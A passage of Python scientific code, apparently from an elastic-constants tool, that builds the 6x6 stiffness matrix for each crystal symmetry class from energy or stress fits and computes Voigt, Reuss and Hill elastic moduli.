.5*(A2[14]-A2[1]-A2[5])\n C[2,2] = 2.*A2[2] \n C[2,3] = .5*(A2[15]-A2[2]-A2[3])\n C[2,4] = .5*(A2[16]-A2[2]-A2[4])\n C[2,5] = .5*(A2[17]-A2[2]-A2[5])\n C[3,3] = .5*A2[3]\n C[3,4] = .25*(A2[18]-A2[3]-A2[4])\n C[3,5] = .25*(A2[19]-A2[3]-A2[5])\n C[4,4] = .5*A2[4]\n C[4,5] = .25*(A2[20]-A2[4]-A2[5])\n C[5,5] = 
.5*A2[5]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n elif self.__mthd == 'Stress':\n \n if (LC == 'CI' or \\\n LC == 'CII'):\n Matrix = np.mat([[1.0, 5.0, 0.0],\n [2.0, 4.0, 0.0],\n [3.0, 3.0, 0.0],\n [0.0, 0.0, 4.0],\n [0.0, 0.0, 5.0],\n [0.0, 0.0, 6.0]])\n \n if (LC == 'HI' or \\\n LC == 'HII'):\n Matrix = np.mat([[ 1, 2, 3, 0, 0],\n [ 2, 1, 3, 0, 0],\n [ 0, 0, 3, 3, 0],\n [ 0, 0, 0, 0, 4],\n [ 0, 0, 0, 0, 5],\n [ 3,-3, 0, 0, 0],\n [ 3,-5,-1, 0, 0],\n [-5, 3,-1, 0, 0],\n [ 0, 0,-2,-1, 0],\n [ 0, 0, 0, 0, 6],\n [ 0, 0, 0, 0, 2],\n [-2, 2, 0, 0, 0]])\n \n if (LC == 'RI'):\n Matrix = np.mat([[ 1, 2, 3, 4, 0, 0],\n [ 2, 1, 3,-4, 0, 0],\n [ 0, 0, 3, 0, 3, 0],\n [ 0, 0, 0,-1, 0, 4],\n [ 0, 0, 0, 6, 0, 5],\n [ 3,-3, 0, 5, 0, 0],\n [ 3,-5,-1, 6, 0, 0],\n [-5, 3,-1,-6, 0, 0],\n [ 0, 0,-2, 0,-1, 0],\n [ 0, 0, 0, 8, 0, 6],\n [ 0, 0, 0,-4, 0, 2],\n [-2, 2, 0, 2, 0, 0]])\n \n if (LC == 'RII'):\n Matrix = np.mat([[ 1, 2, 3, 4, 5, 0, 0],\n [ 2, 1, 3,-4,-5, 0, 0],\n [ 0, 0, 3, 0, 0, 3, 0],\n [ 0, 0, 0,-1,-6, 0, 4],\n [ 0, 0, 0, 6,-1, 0, 5],\n [ 3,-3, 0, 5,-4, 0, 0],\n [ 3,-5,-1, 6, 2, 0, 0],\n [-5, 3,-1,-6,-2, 0, 0],\n [ 0, 0,-2, 0, 0,-1, 0],\n [ 0, 0, 0, 8, 4, 0, 6],\n [ 0, 0, 0,-4, 8, 0, 2],\n [-2, 2, 0, 2,-6, 0, 0]])\n \n if (LC == 'TI'):\n Matrix = np.mat([[ 1, 2, 3, 0, 0, 0],\n [ 2, 1, 3, 0, 0, 0],\n [ 0, 0, 3, 3, 0, 0],\n [ 0, 0, 0, 0, 4, 0],\n [ 0, 0, 0, 0, 5, 0],\n [ 0, 0, 0, 0, 0, 6],\n [ 3,-5,-1, 0, 0, 0],\n [-5, 3,-1, 0, 0, 0],\n [ 0, 0,-2,-1, 0, 0],\n [ 0, 0, 0, 0, 6, 0],\n [ 0, 0, 0, 0, 2, 0],\n [ 0, 0, 0, 0, 0,-4]])\n \n if (LC == 'TII'):\n Matrix = np.mat([[ 1, 2, 3, 6, 0, 0, 0],\n [ 2, 1, 3,-6, 0, 0, 0],\n [ 0, 0, 3, 0, 3, 0, 0],\n [ 0, 0, 0, 0, 0, 4, 0],\n [ 0, 0, 0, 0, 0, 5, 0],\n [ 0, 0, 0,-1, 0, 0, 6],\n [ 3,-5,-1,-4, 0, 0, 0],\n [-5, 3,-1, 4, 0, 0, 0],\n [ 0, 0,-2, 0,-1, 0, 0],\n [ 0, 0, 0, 0, 0, 6, 0],\n [ 0, 0, 0, 0, 0, 2, 0],\n [ 0, 0, 0, 8, 0, 0,-4]])\n \n if (LC == 'O'):\n Matrix = np.mat([[1, 2, 3, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 2, 3, 0, 0, 0, 0],\n [0, 0, 1, 0, 2, 3, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 4, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 5, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 6],\n [3,-5,-1, 0, 0, 0, 0, 0, 0],\n [0, 3, 0,-5,-1, 0, 0, 0, 0],\n [0, 0, 3, 0,-5,-1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 6, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 2, 0],\n [0, 0, 0, 0, 0, 0, 0, 0,-4],\n [5, 4, 6, 0, 0, 0, 0, 0, 0],\n [0, 5, 0, 4, 6, 0, 0, 0, 0],\n [0, 0, 5, 0, 4, 6, 0, 0, 0],\n [0, 0, 0, 0, 0, 0,-2, 0, 0],\n [0, 0, 0, 0, 0, 0, 0,-1, 0],\n [0, 0, 0, 0, 0, 0, 0, 0,-3]])\n \n if (LC == 'M'):\n Matrix = np.mat([[ 1, 2, 3, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 1, 0, 0, 2, 3, 6, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 1, 0, 0, 2, 0, 3, 6, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 5, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 5, 0],\n [ 0, 0, 0, 1, 0, 0, 2, 0, 3, 0, 0, 0, 6],\n [-2, 1, 4,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-2, 0, 0, 1, 4,-5, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-2, 0, 0, 1, 0, 4,-5, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 6, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 6, 0],\n [ 0, 0, 0,-2, 0, 0, 1, 0, 4, 0, 0,-5, 0],\n [ 3,-5,-1,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 3, 0, 0,-5,-1,-4, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 3, 0, 0,-5, 0,-1,-4, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 2, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 2, 0],\n [ 0, 0, 0, 3, 0, 0,-5, 0,-1, 0, 0,-4, 0],\n [-4,-6, 5, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-4, 0, 0,-6, 5, 2, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-4, 0, 0,-6, 0, 5, 2, 0, 0, 0, 0],\n [ 0, 
0, 0, 0, 0, 0, 0, 0, 0, 1,-3, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,-3, 0],\n [ 0, 0, 0,-4, 0, 0,-6, 0, 5, 0, 0, 2, 0],\n [ 5, 4, 6,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 5, 0, 0, 4, 6,-3, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 5, 0, 0, 4, 0, 6,-3, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0],\n [ 0, 0, 0, 5, 0, 0, 4, 0, 6, 0, 0,-3, 0]])\n \n if (LC == 'N'):\n Matrix = np.mat([[ 1, 2, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 1, 0, 0, 0, 0, 2, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 5, 6, 0, 0, 0],\n [ 0, 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 0, 5, 6, 0],\n [ 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 0, 5, 6],\n [-2, 1, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-2, 0, 0, 0, 0, 1, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 6,-5, 0, 0, 0],\n [ 0, 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 0, 6,-5, 0],\n [ 0, 0, 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 0, 6,-5],\n [ 3,-5,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 3, 0, 0, 0, 0,-5,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 2,-4, 0, 0, 0],\n [ 0, 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 0, 2,-4, 0],\n [ 0, 0, 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 0, 2,-4],\n [-4,-6, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-4, 0, 0, 0, 0,-6, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1,-3, 2, 0, 0, 0],\n [ 0, 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1, 0,-3, 2, 0],\n [ 0, 0, 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1, 0,-3, 2],\n [ 5, 4, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 5, 0, 0, 0, 0, 4, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2,-1,-3, 0, 0, 0],\n [ 0, 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2, 0,-1,-3, 0],\n [ 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2, 0,-1,-3],\n [-6, 3,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-6, 0, 0, 0, 0, 3,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5,-4, 1, 0, 0, 0],\n [ 0, 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5, 0,-4, 1, 0],\n [ 0, 0, 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5, 0,-4, 1]])\n \n sigma = np.array(self.__sigma[etacalc])\n \n ci = np.linalg.lstsq(Matrix,sigma)\n \n #-- Cubic structures ------------------------------------------------------------------------------\n if (LC == 'CI' or \\\n LC == 'CII'):\n \n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[3,3]=ci[0][2]\n C[1,1]=C[0,0]\n C[2,2]=C[0,0]\n C[0,2]=C[0,1]\n C[1,2]=C[0,1]\n C[4,4]=C[3,3]\n C[5,5]=C[3,3]\n \n #-- Hexagonal Structures --------------------------------------------------------------------------\n if (LC == 'HI' or \\\n LC == 'HII'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[2,2]=ci[0][3]\n C[3,3]=ci[0][4]\n C[1,1]=C[0,0]\n C[1,2]=C[0,2]\n C[4,4]=C[3,3]\n 
C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Rhombohedral I Structures ---------------------------------------------------------------------\n if (LC == 'RI'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,3]= ci[0][3]\n C[2,2]= ci[0][4]\n C[3,3]= ci[0][5]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,3]=-C[0,3]\n C[4,5]= C[0,3]\n C[4,4]= C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Rhombohedral II Structures --------------------------------------------------------------------\n if (LC == 'RII'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,3]= ci[0][3]\n C[0,4]= ci[0][4]\n C[2,2]= ci[0][5]\n C[3,3]= ci[0][6]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,3]=-C[0,3]\n C[4,5]= C[0,3]\n C[1,4]=-C[0,4]\n C[3,5]=-C[0,4]\n C[4,4]= C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Tetragonal I Structures -----------------------------------------------------------------------\n if (LC == 'TI'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[2,2]= ci[0][3]\n C[3,3]= ci[0][4]\n C[5,5]= ci[0][5]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[4,4]= C[3,3]\n \n #-- Tetragonal II Structures ----------------------------------------------------------------------\n if (LC == 'TII'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,5]= ci[0][3]\n C[2,2]= ci[0][4]\n C[3,3]= ci[0][5]\n C[5,5]= ci[0][6]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,5]=-C[0,5]\n C[4,4]= C[3,3]\n \n #-- Orthorhombic Structures -----------------------------------------------------------------------\n if (LC == 'O'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[1,1]=ci[0][3]\n C[1,2]=ci[0][4]\n C[2,2]=ci[0][5]\n C[3,3]=ci[0][6]\n C[4,4]=ci[0][7]\n C[5,5]=ci[0][8]\n \n #-- Monoclinic Structures -------------------------------------------------------------------------\n if (LC == 'M'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[0,5]=ci[0][3]\n C[1,1]=ci[0][4]\n C[1,2]=ci[0][5]\n C[1,5]=ci[0][6]\n C[2,2]=ci[0][7]\n C[2,5]=ci[0][8]\n C[3,3]=ci[0][9]\n C[3,4]=ci[0][10]\n C[4,4]=ci[0][11]\n C[5,5]=ci[0][12]\n \n #-- Triclinic Structures --------------------------------------------------------------------------\n if (LC == 'N'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[0,3]=ci[0][3]\n C[0,4]=ci[0][4]\n C[0,5]=ci[0][5]\n C[1,1]=ci[0][6]\n C[1,2]=ci[0][7]\n C[1,3]=ci[0][8]\n C[1,4]=ci[0][9]\n C[1,5]=ci[0][10]\n C[2,2]=ci[0][11]\n C[2,3]=ci[0][12]\n C[2,4]=ci[0][13]\n C[2,5]=ci[0][14]\n C[3,3]=ci[0][15]\n C[3,4]=ci[0][16]\n C[3,5]=ci[0][17]\n C[4,4]=ci[0][18]\n C[4,5]=ci[0][19]\n C[5,5]=ci[0][20]\n #--------------------------------------------------------------------------------------------------\n \n \n \n for i in range(5):\n for j in range(i+1,6):\n C[j,i] = C[i,j] \n #%%%--- Calculating the elastic moduli ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if self.__cod in ['espresso']: C = -C/10.\n elif self.__cod in ['vasp','exciting','wien']: C = C*self.__vToGPa/self.__V0#C = C/4.#C=C*self.__CONV/self.__V0\n elif self.__cod in ['emto']: C = C*self.__ToGPa/self.__V0\n self.BV = (C[0,0]+C[1,1]+C[2,2]+2*(C[0,1]+C[0,2]+C[1,2]))/9\n self.GV = ((C[0,0]+C[1,1]+C[2,2])-(C[0,1]+C[0,2]+C[1,2])+3*(C[3,3]+C[4,4]+C[5,5]))/15\n self.EV = (9*self.BV*self.GV)/(3*self.BV+self.GV)\n self.nuV= (1.5*self.BV-self.GV)/(3*self.BV+self.GV)\n self.S = np.linalg.inv(C)\n self.BR = 1/(self.S[0,0]+self.S[1,1]+self.S[2,2]+2*(self.S[0,1]+self.S[0,2]+self.S[1,2]))\n self.GR 
=15/(4*(self.S[0,0]+self.S[1,1]+self.S[2,2])-4*(self.S[0,1]+self.S[0,2]+self.S[1,2])+3*(self.S[3,3]+self.S[4,4]+self.S[5,5]))\n self.ER = (9*self.BR*self.GR)/(3*self.BR+self.GR)\n self.nuR= (1.5*self.BR-self.GR)/(3*self.BR+self.GR)\n self.BH = 0.50*(self.BV+self.BR)\n self.GH = 0.50*(self.GV+self.GR)\n self.EH = (9.*self.BH*self.GH)/(3.*self.BH+self.GH)\n self.nuH= (1.5*self.BH-self.GH)/(3.*self.BH+self.GH)\n self.AVR= 100.*(self.GV-self.GR)/(self.GV+self.GR)\n #--------------------------------------------------------------------------------------------------------------------------------\n self.__C = C\n \n else:\n Cs = []\n for t in map(str,self.__T):#for t in range(len(self.__T)):\n C = np.zeros((6,6))\n \n LC = self.__structures.items()[0][1].LC\n if self.__mthd == 'Energy':\n if type(etacalc)==list:\n A2=[]\n for i in range(len(etacalc)):\n A2.append(self.__A2[t][i][etacalc[i]])\n else:\n if not etacalc in self.__A2[t][0].keys(): raise ValueError('Please coose one of %s'%(self.__A2[t][0].keys()))\n A2 = [a2[etacalc] for a2 in self.__A2[t]]\n \n #%%%--- Cubic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'CI' or \\\n LC == 'CII'):\n C[0,0] =-2.*(A2[0]-3.*A2[1])/3.\n C[1,1] = C[0,0]\n C[2,2] = C[0,0]\n C[3,3] = A2[2]/6.\n C[4,4] = C[3,3]\n C[5,5] = C[3,3]\n C[0,1] = (2.*A2[0]-3.*A2[1])/3.\n C[0,2] = C[0,1]\n C[1,2] = C[0,1]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Hexagonal structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'HI' or \\\n LC == 'HII'):\n C[0,0] = 2.*A2[3]\n C[0,1] = 2./3.*A2[0] + 4./3.*A2[1] - 2.*A2[2] - 2.*A2[3]\n C[0,2] = 1./6.*A2[0] - 2./3.*A2[1] + 0.5*A2[2]\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[2,2] = 2.*A2[2]\n C[3,3] =-0.5*A2[2] + 0.5*A2[4]\n C[4,4] = C[3,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Rhombohedral I structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'RI'):\n C[0,0] = 2.*A2[3]\n C[0,1] = A2[1]- 2.*A2[3]\n C[0,2] = .5*( A2[0] - A2[1] - A2[2])\n C[0,3] = .5*(-A2[3] - A2[4] + A2[5])\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[1,3] =-C[0,3]\n C[2,2] = 2.*A2[2]\n C[3,3] = .5*A2[4]\n C[4,4] = C[3,3]\n C[4,5] = C[0,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Rhombohedral II structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'RII'):\n C[0,0] = 2.*A2[3]\n C[0,1] = A2[1]- 2.*A2[3]\n C[0,2] = .5*( A2[0] - A2[1] - A2[2])\n C[0,3] = .5*(-A2[3] - A2[4] + A2[5])\n C[0,4] = .5*(-A2[3] - A2[4] + A2[6])\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[1,3] =-C[0,3]\n C[1,4] =-C[0,4] \n C[2,2] = 2.*A2[2]\n C[3,3] = .5*A2[4]\n C[3,5] =-C[0,4]\n C[4,4] = C[3,3]\n C[4,5] = C[0,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Tetragonal I structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'TI'):\n C[0,0] = 
(A2[0]+2.*A2[1])/3.+.5*A2[2]-A2[3]\n C[0,1] = (A2[0]+2.*A2[1])/3.-.5*A2[2]-A2[3]\n C[0,2] = A2[0]/6.-2.*A2[1]/3.+.5*A2[3]\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[2,2] = 2.*A2[3]\n C[3,3] = .5*A2[4]\n C[4,4] = C[3,3]\n C[5,5] = .5*A2[5]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Tetragonal II structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'TII'):\n C[0,0] = (A2[0]+2.*A2[1])/3.+.5*A2[2]-A2[4]\n C[1,1] = C[0,0]\n C[0,1] = (A2[0]+2.*A2[1])/3.-.5*A2[2]-A2[4]\n C[0,2] = A2[0]/6.-(2./3.)*A2[1]+.5*A2[4]\n C[0,5] = (-A2[2]+A2[3]-A2[6])/4.\n C[1,2] = C[0,2]\n C[1,5] =-C[0,5]\n C[2,2] = 2.*A2[4]\n C[3,3] = .5*A2[5]\n C[4,4] = C[3,3]\n C[5,5] = .5*A2[6]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Orthorhombic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'O'):\n C[0,0] = 2.*A2[0]/3.+4.*A2[1]/3.+A2[3]-2.*A2[4]-2.*A2[5]\n C[0,1] = 1.*A2[0]/3.+2.*A2[1]/3.-.5*A2[3]-A2[5]\n C[0,2] = 1.*A2[0]/3.-2.*A2[1]/3.+4.*A2[2]/3.-.5*A2[3]-A2[4]\n C[1,1] = 2.*A2[4]\n C[1,2] =-2.*A2[1]/3.-4.*A2[2]/3.+.5*A2[3]+A2[4]+A2[5]\n C[2,2] = 2.*A2[5]\n C[3,3] = .5*A2[6]\n C[4,4] = .5*A2[7]\n C[5,5] = .5*A2[8]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Monoclinic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'M'):\n C[0,0] = 2.*A2[0]/3.+8.*(A2[1]+A2[2])/3.-2.*(A2[5]+A2[8]+A2[9])\n C[0,1] = A2[0]/3.+4.*(A2[1]+A2[2])/3.-2.*A2[5]-A2[9]\n C[0,2] =(A2[0]-4.*A2[2])/3.+A2[5]-A2[8]\n C[0,5] =-1.*A2[0]/6.-2.*(A2[1]+A2[2])/3.+.5*(A2[5]+A2[7]+A2[8]+A2[9]-A2[12])\n C[1,1] = 2.*A2[8]\n C[1,2] =-4.*(2.*A2[1]+A2[2])/3.+2.*A2[5]+A2[8]+A2[9]+A2[12]\n C[1,5] =-1.*A2[0]/6.-2.*(A2[1]+A2[2])/3.-.5*A2[3]+A2[5]+.5*(A2[7]+A2[8]+A2[9])\n C[2,2] = 2.*A2[9]\n C[2,5] =-1.*A2[0]/6.+2.*A2[1]/3.-.5*(A2[3]+A2[4]-A2[7]-A2[8]-A2[9]-A2[12])\n C[3,3] = .5*A2[10]\n C[3,4] = .25*(A2[6]-A2[10]-A2[11])\n C[4,4] = .5*A2[11]\n C[5,5] = .5*A2[12]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Triclinic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'N'):\n C[0,0] = 2.*A2[0]\n C[0,1] = 1.*(-A2[0]-A2[1]+A2[6])\n C[0,2] = 1.*(-A2[0]-A2[2]+A2[7])\n C[0,3] = .5*(-A2[0]-A2[3]+A2[8]) \n C[0,4] = .5*(-A2[0]+A2[9]-A2[4])\n C[0,5] = .5*(-A2[0]+A2[10]-A2[5])\n C[1,1] = 2.*A2[1]\n C[1,2] = 1.*(A2[11]-A2[1]-A2[2])\n C[1,3] = .5*(A2[12]-A2[1]-A2[3])\n C[1,4] = .5*(A2[13]-A2[1]-A2[4])\n C[1,5] = .5*(A2[14]-A2[1]-A2[5])\n C[2,2] = 2.*A2[2] \n C[2,3] = .5*(A2[15]-A2[2]-A2[3])\n C[2,4] = .5*(A2[16]-A2[2]-A2[4])\n C[2,5] = .5*(A2[17]-A2[2]-A2[5])\n C[3,3] = .5*A2[3]\n C[3,4] = .25*(A2[18]-A2[3]-A2[4])\n C[3,5] = .25*(A2[19]-A2[3]-A2[5])\n C[4,4] = .5*A2[4]\n C[4,5] = .25*(A2[20]-A2[4]-A2[5])\n C[5,5] = .5*A2[5]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n elif self.__mthd == 'Stress':\n \n if (LC == 'CI' or \\\n LC == 'CII'):\n Matrix = np.mat([[1.0, 5.0, 0.0],\n [2.0, 4.0, 0.0],\n [3.0, 3.0, 0.0],\n [0.0, 
0.0, 4.0],\n [0.0, 0.0, 5.0],\n [0.0, 0.0, 6.0]])\n \n if (LC == 'HI' or \\\n LC == 'HII'):\n Matrix = np.mat([[ 1, 2, 3, 0, 0],\n [ 2, 1, 3, 0, 0],\n [ 0, 0, 3, 3, 0],\n [ 0, 0, 0, 0, 4],\n [ 0, 0, 0, 0, 5],\n [ 3,-3, 0, 0, 0],\n [ 3,-5,-1, 0, 0],\n [-5, 3,-1, 0, 0],\n [ 0, 0,-2,-1, 0],\n [ 0, 0, 0, 0, 6],\n [ 0, 0, 0, 0, 2],\n [-2, 2, 0, 0, 0]])\n \n if (LC == 'RI'):\n Matrix = np.mat([[ 1, 2, 3, 4, 0, 0],\n [ 2, 1, 3,-4, 0, 0],\n [ 0, 0, 3, 0, 3, 0],\n [ 0, 0, 0,-1, 0, 4],\n [ 0, 0, 0, 6, 0, 5],\n [ 3,-3, 0, 5, 0, 0],\n [ 3,-5,-1, 6, 0, 0],\n [-5, 3,-1,-6, 0, 0],\n [ 0, 0,-2, 0,-1, 0],\n [ 0, 0, 0, 8, 0, 6],\n [ 0, 0, 0,-4, 0, 2],\n [-2, 2, 0, 2, 0, 0]])\n \n if (LC == 'RII'):\n Matrix = np.mat([[ 1, 2, 3, 4, 5, 0, 0],\n [ 2, 1, 3,-4,-5, 0, 0],\n [ 0, 0, 3, 0, 0, 3, 0],\n [ 0, 0, 0,-1,-6, 0, 4],\n [ 0, 0, 0, 6,-1, 0, 5],\n [ 3,-3, 0, 5,-4, 0, 0],\n [ 3,-5,-1, 6, 2, 0, 0],\n [-5, 3,-1,-6,-2, 0, 0],\n [ 0, 0,-2, 0, 0,-1, 0],\n [ 0, 0, 0, 8, 4, 0, 6],\n [ 0, 0, 0,-4, 8, 0, 2],\n [-2, 2, 0, 2,-6, 0, 0]])\n \n if (LC == 'TI'):\n Matrix = np.mat([[ 1, 2, 3, 0, 0, 0],\n [ 2, 1, 3, 0, 0, 0],\n [ 0, 0, 